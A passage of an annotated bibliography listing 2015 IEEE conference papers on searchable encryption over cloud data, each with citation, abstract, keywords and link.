Keywords: cryptography; file servers; information retrieval; outsourcing; security of data; authorized users; ciphertext; data sharing classification; document encryption; multikey searchable encryption; one-way function; outsourced server analysis; Access control; Concrete; Data models; Encryption; Servers; Homomorphism; Multi-key; Searchable Encryption (ID#: 16-9132)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7096153&isnumber=7096097

 

Emura, K.; Le Trieu Phong; Watanabe, Y., "Keyword Revocable Searchable Encryption with Trapdoor Exposure Resistance and Re-generateability," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 167-174, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.371

Abstract: In searchable encryption in the public key setting, a trapdoor is uploaded to a server, and the server runs the test algorithm by using the trapdoor. However, if trapdoors stored in the server will be exposed due to unexpected situations, then anyone can run the test algorithm. Therefore, the trapdoor revocation functionality is desirable in practice. Moreover, even certain keyword revocation functionality is supported, the impact of trapdoor exposure should be minimized. In addition to this, it seems difficult to assume that revoked keywords will never be used. Therefore, we need to consider the case where a new trapdoor can be generated even a trapdoor has been revoked before. In this paper, we give a formal definition of keyword revocable public key encryption with keyword search (KR-PEKS), and propose a generic construction of KR-PEKS from revocable identity-based encryption with a certain anonymity. Our construction is not only a generalization of revocable keyword search proposed by with Yu, Ni, Yang, Mu, and Susilo (Security and Communication Networks 2014), but also supports trapdoor exposure resistance which guarantees that an exposure of a trapdoor does not infect of other trapdoors, and trapdoor re-generateability which guarantee that a new trapdoor can be generated even a keyword has been revoked before.

Keywords: public key cryptography; KR-PEKS; generic construction; keyword revocable public key encryption-with-keyword search; keyword revocable searchable encryption; regenerateability; revocable identity-based encryption; trapdoor exposure resistance; keyword revocation; revocable identity-based encryption; searchable encryption (ID#: 16-9133)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345279&isnumber=7345233

 

Bing Wang; Wei Song; Wenjing Lou; Hou, Y.T., "Inverted Index Based Multi-Keyword Public-Key Searchable Encryption with Strong Privacy Guarantee," in Computer Communications (INFOCOM), 2015 IEEE Conference on, pp. 2092-2100, April 26 2015-May 1 2015. doi: 10.1109/INFOCOM.2015.7218594

Abstract: With the growing awareness of data privacy, more and more cloud users choose to encrypt their sensitive data before outsourcing them to the cloud. Search over encrypted data is therefore a critical function facilitating efficient cloud data access given the high data volume that each user has to handle nowadays. Inverted index is one of the most efficient searchable index structures and has been widely adopted in plaintext search. However, securing an inverted index and its associated search schemes is not a trivial task. A major challenge exposed from the existing efforts is the difficulty to protect user's query privacy. The challenge roots on two facts: 1) the existing solutions use a deterministic trapdoor generation function for queries; and 2) once a keyword is searched, the encrypted inverted list for this keyword is revealed to the cloud server. We denote this second property in the existing solutions as one-time-only search limitation. Additionally, conjunctive multi-keyword search, which is the most common form of query nowadays, is not supported in those works. In this paper, we propose a public-key searchable encryption scheme based on the inverted index. Our scheme preserves the high search efficiency inherited from the inverted index while lifting the one-time-only search limitation of the previous solutions. Our scheme features a probabilistic trapdoor generation algorithm and protects the search pattern. In addition, our scheme supports conjunctive multi-keyword search. Compared with the existing public key based schemes that heavily rely on expensive pairing operations, our scheme is more efficient by using only multiplications and exponentiations. To meet stronger security requirements, we strengthen our scheme with an efficient oblivious transfer protocol that hides the access pattern from the cloud. The simulation results demonstrate that our scheme is suitable for practical usage with moderate overhead.

Keywords: cloud computing; data privacy; public key cryptography; cloud computing; cloud data access; cloud server; cloud users; conjunctive multikeyword search; data privacy; data volume; inverted index; multikeyword public key searchable encryption; plaintext search; probabilistic trapdoor generation algorithm; public key searchable encryption scheme; search pattern; searchable index structures; sensitive data; trapdoor generation function; user query privacy; Encryption; Indexes; Polynomials; Privacy; Public key; Servers (ID#: 16-9134)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7218594&isnumber=7218353

 

Syh-Yuan Tan; Ji-Jian Chin; Geong-Sen Poh; Kam, Y.H.S.; Wei-Chuen Yau, "A Client-Server Prototype of a Symmetric Key Searchable Encryption Scheme Using Open-Source Applications," in IT Convergence and Security (ICITCS), 2015 5th International Conference on, pp. 1-5, 24-27 Aug. 2015. doi: 10.1109/ICITCS.2015.7292892

Abstract: Searchable encryption is a cryptographic primitive that allows a user to confidentially store items on an outside server and grants the user the capability to search for any particular item that is stored without the server or any third party observers learning anything with regards to the item that is being searched for. In 2006, Curtmola et al. strengthened the security notions for symmetric-key searchable encyrption (SSE) and proposed two secure constructions that utilize only a conventional symmetric-key encryption scheme such as Advanced Encryption Standard (AES). In this work, we show a client-server prototype implementation of the adaptive-secure scheme by Curtmola et al. utilizing only open source software on both client and server side. We show that our implementation runs in reasonable time and provides confidential search functions as defined by SSE schemes.

Keywords: client-server systems; cryptography; data privacy; public domain software; AES; Advanced Encryption Standard; adaptive-secure scheme; client-server prototype; confidential item storage; confidential search function; cryptography; open source software; open-source applications; security; symmetric key searchable encryption scheme; Encryption; Indexes; Prototypes; Servers (ID#: 16-9135)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7292892&isnumber=7292885

 

Wenjun Luo; Yaqiong Chen; Yousheng Zhou, "Dynamic Searchable Encryption with Multi-user Private Search for Cloud Computing," in Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on, pp. 176-182, 26-28 Oct. 2015. doi: 10.1109/CIT/IUCC/DASC/PICOM.2015.359

Abstract: Dynamic searchable encryption enables data owner to store a dynamic collection of encrypted files to the cloud server and generate search tokens of queries over the cloud server. Upon receiving a token, the server can perform the search on the encrypted data while preserving privacy. Unlike many previous works that focused on a single-user scheme, we present a dynamic searchable encryption scheme with multi-user private search for cloud computing. We consider the use scenario of cloud storage services where an organization outsources its data to the cloud and authorizes a group of users to access the data. Our scheme is dependent on a red-black data structure which is highly parallelizable and dynamic, and its security is proven in the random oracle model.

Keywords: cloud computing; cryptography; data privacy; data structures; cloud computing; cloud server; cloud storage services; data owner; dynamic searchable encryption scheme; encrypted files; multiuser private search; privacy preservation; random oracle model; red-black data structure; search tokens; Cloud computing; Encryption; Indexes; Privacy; Servers; Secure cloud storage; privacy; multi-user setting  (ID#: 16-9136)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363068&isnumber=7362962

 

Koschuch, M.; Hombauer, M.; Schefer-Wenzl, S.; Habock, U.; Hrdlicka, S., "Fogging The Cloud — Implementing and Evaluating Searchable Encryption Schemes in Practice," in Integrated Network Management (IM), 2015 IFIP/IEEE International Symposium on, pp. 1365-1368, 11-15 May 2015. doi: 10.1109/INM.2015.7140497

Abstract: With the rise of cloud computing new ways to secure outsourced data have to be devised. Traditional approaches like simply encrypting all data before it is transferred only partially alleviate this problem. Searchable Encryption (SE) schemes enable the cloud provider to search for user supplied strings in the encrypted documents, while neither learning anything about the content of the documents nor about the search terms. Currently there are many different SE schemes defined in the literature, with their number steadily growing. But experimental results of real world performance, or direct comparisons between different schemes, are severely lacking. In this work we propose a simple Java client-server framework to efficiently implement different SE algorithms and compare their efficiency in practice. In addition, we demonstrate the possibilities of such a framework by implementing two different existing SE schemes from slightly different domains and compare their behavior in a real-world setting.

Keywords: Java; cloud computing; cryptography; document handling; Java client-server framework; SE schemes; cloud computing; encrypted documents; outsourced data security; searchable encryption schemes; user supplied strings; Arrays; Conferences; Encryption; Indexes; Servers (ID#: 16-9137)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7140497&isnumber=7140257

 

Mallaiah, Kurra; Ramachandram, S; Gandhi, Rishi Kumar, "Multi User Searchable Encryption Schemes Using Trusted Proxy for Cloud Based Relational Databases," in Green Computing and Internet of Things (ICGCIoT), 2015 International Conference on, pp. 1554-1559, 8-10 Oct. 2015. doi: 10.1109/ICGCIoT.2015.7380714

Abstract: Use of cloud Database-as-a-Service (DaaS) is gradually increasing in private and government organizations. Organizations are now considering outsourcing of their local databases to cloud database servers to minimize their operational and maintenance expenses. At the same time, users are apprehensive about the confidentiality breach of their vital data in cloud database. To achieve complete confidentiality of such data in outsourced databases, it is required to keep data in always-encrypted form in its entire life cycle i.e. at rest, in transition and while in operation in premises of cloud database services. Searchable encryption is a scheme, which allows users to perform an encrypted keyword search on encrypted data stored in database server directly without decrypting it. In many applications, it requires to access the database by multiple users where data is written by different users using different encryption keys. In this paper, we propose schemes for Multi user multi-key Encryption Search for cloud Relational Databases (MES-RD). It supports search operation on data encrypted under different keys by multiple users using a Trusted Proxy. These data may be stored in a shared table under one or other column of database server. To the best of our knowledge, the proposed schemes MES-RD are practical and first time proposed for databases.

Keywords: Computer hacking; Databases; Encryption; Levee; Organizations; Servers; Cloud computing; Database security; Multikey Encryption Search (ID#: 16-9138)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7380714&isnumber=7380415

 

Xu, Lei; Xu, Chungen, "Efficient and Secure Data Retrieval Scheme Using Searchable Encryption in Cloud Storage," in Security and Privacy in Social Networks and Big Data (SocialSec), 2015 International Symposium on, pp. 15-21, 16-18 Nov. 2015. doi: 10.1109/SocialSec2015.16

Abstract: In the new era of data explosion, the problem of data storage and portability were solved with the advent of the cloud technologies. But the attendant problem is that most of the data stored by users are always uploaded as the form of plaintext, this means that the more data and information are uploaded by the user in cloud, the more privacy and information security risks will be. This paper presents a data retrieval system by using public key encryption system with keyword search, in which the client could test whether or not the file stored in cloud server contains the keyword without leaking the information about the encrypted file. We apply asymmetric pairings to achieve shorter key size scheme in the standard model, and adopt the dual system encryption technique to reduce the scheme's secure problem to the hard Symmetric External Diffie-Hellman assumption. In the last of paper, we analyse the scheme's efficiency and point out that our scheme is more efficient and secure than some other classical data retrieval models.

Keywords: Big data; Data privacy; Security; Social network services; asymmetric pairings; data retrieval; dual system encryption; keyword search encryption (ID#: 16-9139)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371894&isnumber=7371823

 

Chang Liu; Liehuang Zhu; Jinjun Chen, "Efficient Searchable Symmetric Encryption for Storing Multiple Source Data on Cloud," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 451-458, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.406

Abstract: Cloud computing has greatly facilitated large-scale data outsourcing due to its cost efficiency, scalability and many other advantages. Subsequent privacy risks force data owners to encrypt sensitive data, hence making the outsourced data no longer searchable. Searchable Symmetric Encryption (SSE) is an advanced cryptographic primitive addressing the above issue, which maintains efficient keyword search over encrypted data without disclosing much information to the storage provider. Existing SSE schemes implicitly assume that original user data is centralized, so that a searchable index can be built at once. Nevertheless, especially in cloud computing applications, user-side data centralization is not reasonable, e.g. an enterprise distributes its data in several data centers. In this paper, we propose the notion of Multi-Data-Source SSE (MDS-SSE), which allows each data source to build a local index individually and enables the storage provider to merge all local indexes into a global index afterwards. We propose a novel MDS-SSE scheme, in which an adversary only learns the number of data sources, the number of entire data files, the access pattern and the search pattern, but not any other distribution information such as how data files or search results are distributed over data sources. We offer rigorous security proof of our scheme, and report experimental results to demonstrate the efficiency of our scheme.

Keywords: cloud computing; cryptography; storage management; MDS-SSE scheme; cloud computing; large-scale data outsourcing; multiple source data storage; searchable symmetric encryption; Cloud computing; Distributed databases; Encryption; Indexes; Servers; Cloud Computing; Data Outsourcing; Multiple Data Sources; Searchable Symmetric Encryption (ID#: 16-9140)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345314&isnumber=7345233

 

Mithuna, R.; Suguna, M., "Integrity checking Over Encrypted Cloud Data," in Signal Processing, Communication and Networking (ICSCN), 2015 3rd International Conference on, pp. 1-5, 26-28 March 2015. doi: 10.1109/ICSCN.2015.7219916

Abstract: Cloud providers provide various promising services to users and this makes the cloud to be very popular among users. Cloud computing is a location independent computing wherein files are outsourced as a service. Users outsource their data to the third party cloud server to reduce various costs such as storage, management etc. The outsourced data may have sensitive and valuable information that needs to be secured. In order to assure confidentiality, users encrypt their data before outsourcing it to the cloud server. But the searching and retrieval of encrypted files becomes too complex. The existing works on searchable encryption focus on Single keyword search, Multi-keyword search, Boolean keyword search and rarely vary the search results. In Multi-Keyword Ranked Search Over Encrypted Cloud Data (MRSE), ranked searchable symmetric encryption scheme is used for efficient retrieval of similar data from the cloud server based on the ranking. Even though the ranking scheme provides most similar files from the cloud server, one cannot assure whether the retrieved files are having same fields are not. In this paper for the first time, ranking fixed by the cloud server is being tested to check the correctness of its order. Rank test method is used to check the integrity of the rank order over the search results. Since the rank fixed by cloud server is checked, the user can get accurate results and so privacy can be improved.

Keywords: cloud computing; cryptography; data integrity; data privacy; information retrieval; outsourcing; Boolean keyword search; MRSE; cloud computing; cloud provider; data confidentiality; encrypted file; integrity checking; location independent computing; multikeyword ranked search over encrypted cloud data; multikeyword search; outsourced data; outsourcing; rank test method; ranked searchable symmetric encryption scheme; ranking scheme; retrieved file; searchable encryption focus; single keyword search; third party cloud server; Encryption; Legged locomotion; Outsourcing; Privacy; Servers; cloud computing; encrypted file; integrity; privacy preserving; ranked results (ID#: 16-9141)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7219916&isnumber=7219823

 

Peisong Shen; Chi Chen; Xue Tian; Jing Tian, "A Similarity Evaluation Algorithm and Its Application in Multi-Keyword Search on Encrypted Cloud Data," in Military Communications Conference, MILCOM 2015 - 2015 IEEE, pp. 1218-1223, 26-28 Oct. 2015. doi: 10.1109/MILCOM.2015.7357612

Abstract: Searchable symmetric encryption (SSE), known as privacy-preserving keyword search, allows users to perform keyword search on encrypted data. However, until now there are no practical SSE schemes which can support query-document similarity evaluation and provide top-k retrieval on encrypted cloud data. This problem slows down the process of SSE schemes' application in cloud storage service. In this paper, we propose a server-side similarity evaluation algorithm to realize the sorted search functionality. Based on this, we further propose an entire SSE solution to achieve the goal of privacy-preserving multi-keyword dynamic sorted (MKDS) search functionalities which steps closer to practical deployment. We formally demonstrate the security of our scheme and evaluate the practical performance of our scheme on the real-world dataset.

Keywords: cloud computing; private key cryptography; MKDS; SSE schemes; cloud storage; encrypted cloud data; multikeyword search; privacy-preserving keyword search; privacy-preserving multikeyword dynamic sorted; query-document similarity evaluation; searchable symmetric encryption; similarity evaluation algorithm; Cloud computing; Encryption; Heuristic algorithms; Indexes; Servers; ciphertext search; multi-keyword search; searchable symmetric encryption; similarity evaluation; top-k search (ID#: 16-9142)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357612&isnumber=7357245

 

Fisc, B.A.; Vo, B.; Krell, F.; Kumarasubramanian, A.; Kolesnikov, V.; Malkin, T.; Bellovin, S.M., "Malicious-Client Security in Blind Seer: A Scalable Private DBMS," in Security and Privacy (SP), 2015 IEEE Symposium on, pp. 395-410, 17-21 May 2015. doi: 10.1109/SP.2015.31

Abstract: The Blind Seer system (Oakland 2014) is an efficient and scalable DBMS that affords both client query privacy and server data protection. It also provides the ability to enforce authorization policies on the system, restricting client's queries while maintaining the privacy of both query and policy. Blind Seer supports a rich query set, including arbitrary boolean formulas, and is provably secure with respect to a controlled amount of search pattern leakage. No other system to date achieves this tradeoff of performance, generality, and provable privacy. A major shortcoming of Blind Seer is its reliance on semi-honest security, particularly for access control and data protection. A malicious client could easily cheat the query authorization policy and obtain any database records satisfying any query of its choice, thus violating basic security features of any standard DBMS. In sum, Blind Seer offers additional privacy to a client, but sacrifices a basic security tenet of DBMS. In the present work, we completely resolve the issue of a malicious client. We show how to achieve robust access control and data protection in Blind Seer with virtually no added cost to performance or privacy. Our approach also involves a novel technique for a semi-private function secure function evaluation (SPF-SFE) that may have independent applications. We fully implement our solution and report on its performance.

Keywords: Boolean functions; authorisation; data protection; database management systems; query processing; Blind Seer system; Boolean formulas; SPF-SFE; authorization policies; client query privacy; malicious-client security; query authorization policy; robust access control; scalable private DBMS; search pattern leakage; semiprivate function secure function evaluation; server data protection; Cryptography; Indexes; Logic gates; Privacy; Protocols; Servers; applied cryptography; private DBMS; searchable encryption (ID#: 16-9143)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163038&isnumber=7163005

 

Cheng Guo; Qiongqiong Song; Ruhan Zhuang; Bin Feng, "RSAE: Ranked Keyword Search over Asymmetric Encrypted Cloud Data," in Big Data and Cloud Computing (BDCloud), 2015 IEEE Fifth International Conference on, pp. 82-86, 26-28 Aug. 2015. doi: 10.1109/BDCloud.2015.11

Abstract: Cloud computing becomes more and more popular and is applied into many practical applications because of much cheaper and more powerful features. In cloud system, users can outsource local data to the cloud servers to lighten their local storage and computing resource loads, which products a new industry method of use-on-demand, pay-on-use. However outsourcing data to cloud servers makes sensitive information centralized into the server, which brings great challenge to protecting sensitive information privacy. For privacy preserving, the user encrypts sensitive data before outsourcing. Traditional searchable encryption methods make it possible for users to securely conduct keyword search over encrypted data and finally retrieve the most relevant Top-N files among the whole data. In this paper, we systematically propose a scheme to solve the problem of how to securely and efficiently retrieve the Top-N files by keyword-based searching over encrypted data by asymmetric encrypted.

Keywords: cloud computing; cryptography; data privacy; information retrieval; RSAE; Top-N file retrieval; asymmetric encrypted cloud data; cloud computing; data outsourcing; pay-on-use method; ranked keyword search; searchable encryption methods; sensitive information privacy; use-on-demand method; Cascading style sheets; Cloud computing; Encryption; Keyword search; Servers; Top-N files retrieval; asymmetric encryption; cloud data; identity based encryption; keyword search; searchable encryption (ID#: 16-9144)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7310720&isnumber=7310694

 

Lai, R.W.F.; Chow, S.S.M., "Structured Encryption with Non-interactive Updates and Parallel Traversal," in Distributed Computing Systems (ICDCS), 2015 IEEE 35th International Conference on, pp. 776-777, June 29 2015-July 2 2015. doi: 10.1109/ICDCS.2015.104

Abstract: Searchable Symmetric Encryption (SSE) encrypts data in such a way that they can be searched efficiently. Some recent SSE schemes allow modification of data, yet they may incur storage overhead to support parallelism in searching, or additional computation to minimize the potential leakage incurred by the update, both penalize the performance. Moreover, most of them consider only keyword search and not applicable to arbitrary structured data. In this work, we propose the first parallel and dynamic symmetric-key structured encryption, which supports query of encrypted data structure. Our scheme leverages the rather simple randomized binary search tree to achieve non-interactive queries and updates.

Keywords: cryptography; data structures; parallel processing; query processing; SSE scheme; arbitrary structured data; dynamic symmetric-key structured encryption; encrypted data structure; noninteractive query; noninteractive update; parallel symmetric-key structured encryption; parallel traversal; potential leakage; randomized binary search tree; searchable symmetric encryption; structured encryption; Binary search trees; Complexity theory; Databases; Encryption; Keyword search; Servers; dynamic; non-interactive; parallel; structured encryption; symmetric searchable encryption (ID#: 16-9145)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7164982&isnumber=7164877

 

Strizhov, M.; Ray, I., "Substring Position Search over Encrypted Cloud Data Using Tree-Based Index," in Cloud Engineering (IC2E), 2015 IEEE International Conference on, pp. 165-174, 9-13 March 2015. doi: 10.1109/IC2E.2015.33

Abstract: Existing Searchable Encryption (SE) solutions are able to handle simple boolean search queries, such as single or multi-keyword queries, but cannot handle substring search queries over encrypted data that also involves identifying the position of the substring within the document. These types of queries are relevant in areas such as searching DNA data. In this paper, we propose a tree-based Substring Position Searchable Symmetric Encryption (SSP-SSE) to overcome the existing gap. Our solution efficiently finds occurrences of a substrings over encrypted cloud data. We formally define the leakage functions and security properties of SSP-SSE. Then, we prove that the proposed scheme is secure against chosen-keyword attacks that involve an adaptive adversary. Our analysis demonstrates that SSP-SSE introduces very low overhead on computation and storage.

Keywords: cloud computing; cryptography; query processing; trees (mathematics); DNA data; SSP-SSE; adaptive adversary; boolean search queries; chosen-keyword attacks; cloud data; leakage functions; multikeyword queries; security properties; single keyword queries; substring position search; substring position searchable symmetric encryption; tree-based index; Cloud computing; Encryption; Indexes; Keyword search; Probabilistic logic; cloud computing; position heap tree; searchable symmetric encryption; substring position search (ID#: 16-9146)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7092914&isnumber=7092808

 

Hongwei Li; Dongxiao Liu; Kun Jia; Xiaodong Lin, "Achieving Authorized and Ranked Multi-Keyword Search Over Encrypted Cloud Data," in Communications (ICC), 2015 IEEE International Conference on, pp. 7450-7455, 8-12 June 2015. doi: 10.1109/ICC.2015.7249517

Abstract: In cloud computing, it is important to protect user data. Thus, data owners usually encrypt their data before outsourcing them to the cloud server for security and privacy concerns. At the same time, very often users need to find data for specific keywords of interest to them. This motivates the research on the searchable encryption technique, which allows the search user to search over the encrypted data. Many mechanisms have been proposed, and are mainly focusing on the symmetric searchable encryption (SSE) technique. However, they do not consider the search authorization problem that requires the cloud server only to return the search results to authorized users. In this paper, we propose an authorized and ranked multi-keyword search scheme (ARMS) over encrypted cloud data by leveraging the ciphertext policy attribute-based encryption (CP-ABE) and SSE techniques. Security analysis demonstrates that the proposed ARMS scheme can achieve confidentiality of documents, trapdoor unlinkability and collusion resistance. Extensive experiments show that the ARMS is more superior and efficient than existing approaches in terms of functionalities and computational overhead.

Keywords: authorisation; cloud computing; cryptography; data protection; search problems; ARMS scheme; CP-ABE scheme; SSE technique; authorized and ranked multikeyword search scheme; ciphertext policy attribute-based encryption scheme; cloud computing; cloud data encryption; cloud server; collusion resistance; computational overhead; data privacy; data security; document confidentiality; search authorization problem; symmetric searchable encryption technique; trapdoor unlinkability; user data protection;Authorization;Encryption;Indexes;Servers;Sun;Multi-keyword Ranked Search; Search Authorization; Searchable Encryption (ID#: 16-9147)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7249517&isnumber=7248285

 

Strizhov, M., "Towards a Practical and Efficient Search over Encrypted Data in the Cloud," in Cloud Engineering (IC2E), 2015 IEEE International Conference on, pp. 496-498, 9-13 March 2015. doi: 10.1109/IC2E.2015.86

Abstract: Searchable encryption allows a client to encrypt its document collection in such a way that the encrypted collection can still be searched. The most immediate application of searchable encryption is privacy / confidentiality preserving cloud storage, where it enables a client to securely outsource its document collection to an untrusted cloud provider without sacrificing the ability to search over it. Our research focuses on developing a novel searchable encryption framework that allows the cloud server to perform multi-keyword ranked search as well as substring search incorporating position information. We present some advances that we have accomplished in this area. We then layout our planned research work and a timeline to accomplish this.

Keywords: cloud computing; cryptography; data privacy; document handling; file servers; information retrieval; storage management; cloud server; document collection; encrypted data; multikeyword ranked search; position information; privacy/confidentiality preserving cloud storage; searchable encryption; substring search; untrusted cloud provider; Encryption; Frequency measurement; Indexes; Search problems; Servers; cloud computing; ranked search; searchable symmetric encryption; substring position search (ID#: 16-9148)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7092967&isnumber=7092808

 

Dong, Qiuxiang; Guan, Zhi; Chen, Zhong, "Attribute-Based Keyword Search Efficiency Enhancement via an Online/Offline Approach," in Parallel and Distributed Systems (ICPADS), 2015 IEEE 21st International Conference on, pp. 298-305, 14-17 Dec. 2015. doi: 10.1109/ICPADS.2015.45

Abstract: Searchable encryption is a primitive, which not only protects data privacy of data owners but also enables data users to search over the encrypted data. Most existing searchable encryption schemes are in the single-user setting. There are only few schemes in the multiple data users setting, i.e., encrypted data sharing. Among these schemes, most of the early techniques depend on a trusted third party with interactive search protocols or need cumbersome key management. To remedy the defects, the most recent approaches borrow ideas from attribute-based encryption to enable attribute-based keyword search (ABKS). However, all these schemes incur high computational costs and are not suitable for mobile devices, such as mobile phones, with power consumption constraints. In this paper, we develop new techniques that split the computation for the keyword encryption and trapdoor/token generation into two phases: a preparation phase that does the vast majority of the work to encrypt a keyword or create a token before it knows the keyword or the attribute list/access control policy that will be used. A second phase then rapidly assembles an intermediate ciphertext or trapdoor when the specifics become known. The preparation work can be performed while the mobile device is plugged into a power source, then it can later rapidly perform keyword encryption or token generation operations on the move without significantly draining the battery. We name our scheme Online/Offline ABKS. To the best of our knowledge, this is the first work on constructing efficient multi-user searchable encryption scheme for mobile devices through moving the majority of the cost of keyword encryption and token generation into an offline phase.

Keywords: Cloud computing; Encryption; Keyword search; Search problems; Servers; Mobile Devices; Multi-Owner/Multi-User; Offline; Online; Power Consumption; Searchable Encryption (ID#: 16-9149)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7384308&isnumber=7384203

 

Petcher, A.; Morrisett, G., "A Mechanized Proof of Security for Searchable Symmetric Encryption," in Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, pp. 481-494, 13-17 July 2015. doi: 10.1109/CSF.2015.36

Abstract: We present a mechanized proof of security for an efficient Searchable Symmetric Encryption (SSE) scheme completed in the Foundational Cryptography Framework (FCF). FCF is a Coq library for reasoning about cryptographic schemes in the computational model that features a small trusted computing base and an extensible design. Through this effort, we provide the first mechanized proof of security for an efficient SSE scheme, and we demonstrate that FCF is well-suited to reasoning about such complex protocols.

Keywords: cryptographic protocols; inference mechanisms; theorem proving; trusted computing; Coq library; FCF; SSE scheme; cryptographic scheme; foundational cryptography framework; protocol; reasoning; searchable symmetric encryption; security mechanized proof; trusted computing; Databases; Encryption; Games; Semantics; Servers (ID#: 16-9150)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7243749&isnumber=7243713

 

Frank, J.C.; Frank, S.M.; Thurlow, L.A.; Kroeger, T.M.; Miller, E.L.; Long, D.D.E., "Percival: A Searchable Secret-Split Datastore," in Mass Storage Systems and Technologies (MSST), 2015 31st Symposium on, pp. 1-12, May 30 2015-June 5 2015. doi: 10.1109/MSST.2015.7208296

Abstract: Maintaining information privacy is challenging when sharing data across a distributed long-term datastore. In such applications, secret splitting the data across independent sites has been shown to be a superior alternative to fixed-key encryption; it improves reliability, reduces the risk of insider threat, and removes the issues surrounding key management. However, the inherent security of such a datastore normally precludes it from being directly searched without reassembling the data; this, however, is neither computationally feasible nor without risk since reassembly introduces a single point of compromise. As a result, the secret-split data must be pre-indexed in some way in order to facilitate searching. Previously, fixed-key encryption has also been used to securely pre-index the data, but in addition to key management issues, it is not well suited for long term applications. To meet these needs, we have developed Percival: a novel system that enables searching a secret-split datastore while maintaining information privacy. We leverage salted hashing, performed within hardware security modules, to access prerecorded queries that have been secret split and stored in a distributed environment; this keeps the bulk of the work on each client, and the data custodians blinded to both the contents of a query as well as its results. Furthermore, Percival does not rely on the datastore's exact implementation. The result is a flexible design that can be applied to both new and existing secret-split datastores. When testing Percival on a corpus of approximately one million files, it was found that the average search operation completed in less than one second.

Keywords: cryptography; data privacy; Percival; distributed environment; distributed long-term datastore; hardware security modules; information privacy; salted hashing; searchable secret-split datastore; Encryption; Hardware; Indexes; Search problems; Servers (ID#: 16-9151)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7208296&isnumber=7208272

 

Gopularam, B.P.; Dara, S.; Niranjan, N., "Experiments in Encrypted and Searchable Network Audit Logs," in Emerging Information Technology and Engineering Solutions (EITES), 2015 International Conference on, pp. 18-22, 20-21 Feb. 2015. doi: 10.1109/EITES.2015.13

Abstract: We consider the scenario where a consumer can securely outsource their network telemetry data to a Cloud Service Provider and enable a third party to audit such telemetry for any security forensics. Especially we consider the use case of privacy preserving search in network log audits. In this paper we experiment with advances in Identity Based Encryption and Attribute-Based encryption schemes for auditing network logs.

Keywords: cloud computing; cryptography; data privacy; digital forensics; telemetry; attribute-based encryption; cloud service provider; encrypted network audit logs; identity based encryption; network telemetry data; privacy preserving search; searchable network audit logs; security forensics; Encryption; Privacy; Public key; Servers; Telemetry; audit log privacy; identity based encryption; network telemetry (ID#: 16-9152)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7083378&isnumber=7082065

 

Xingliang Yuan; Xinyu Wang; Yilei Chu; Cong Wang; Chen Qian, "Towards a Scalable, Private, and Searchable Key-Value Store," in Communications and Network Security (CNS), 2015 IEEE Conference on, pp. 773-774, 28-30 Sept. 2015. doi: 10.1109/CNS.2015.7346929

Abstract: Modern distributed key-value stores are offering superior performance, incremental scalability, and fine availability for data-intensive computing and cloud-based applications. Among those distributed data stores, the designs that ensure the confidentiality of sensitive data, however, have not been fully explored yet. In this paper, we focus on designing and implementing a scalable, private, and searchable key-value store. We first design a secure data partition algorithm that distributes encrypted data evenly across a cluster of nodes. Based on this algorithm, we then implement an encrypted key-value store. To enable secure search queries for given attributes or keywords, we leverage searchable symmetric encryption to design the encrypted local indexes that consider security, efficiency, and data locality simultaneously. Performance evaluation at Microsoft Azure is conducted in terms of Put/Get throughput and latency under different workloads. The comparison with HBase shows that our prototype can function in a practical manner.

Keywords: cryptography; telecommunication security; encrypted key-value store; private key-value store; scalable key-value store; searchable key-value store; secure data partition algorithm; secure search queries; Cloud computing; Distributed databases; Encryption; Indexes; Throughput (ID#: 16-9153)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7346929&isnumber=7346791

 

Rui Zhang; Rui Xue, "Efficient Keyword Search for Public-Key Setting," in Military Communications Conference, MILCOM 2015 - 2015 IEEE, pp. 1236-1241, 26-28 Oct. 2015. doi: 10.1109/MILCOM.2015.7357615

Abstract: Querying over encrypted data is gaining increasing popularity in cloud based data hosting services. Security and efficiency are recognized as two important and yet conflicting requirements for querying over encrypted data. In this paper we propose an efficient public-key encryption with keyword search scheme (EPEKS for short) that support binary search for inverted index-based encrypted data. First, we describe approaches of constructing a searchable encryption scheme that supports binary search. Second, we present a novel framework for EPEKS, and provide its formal security definitions in terms of IND-PEKS-CKA security and search pattern privacy by modifying Nishioka's security notions [1]. Third, built on the proposed framework, we design a concrete EPEKS scheme based on the groups of prime order. The scheme enjoys strong notions of security, namely statistical IND-PEKS-CKA security and statistical search pattern privacy. Finally, we experimentally evaluate the proposed EPEKS scheme and show that it is significantly more efficient in terms of search over encrypted data than existing search pattern secure PEKS schemes.

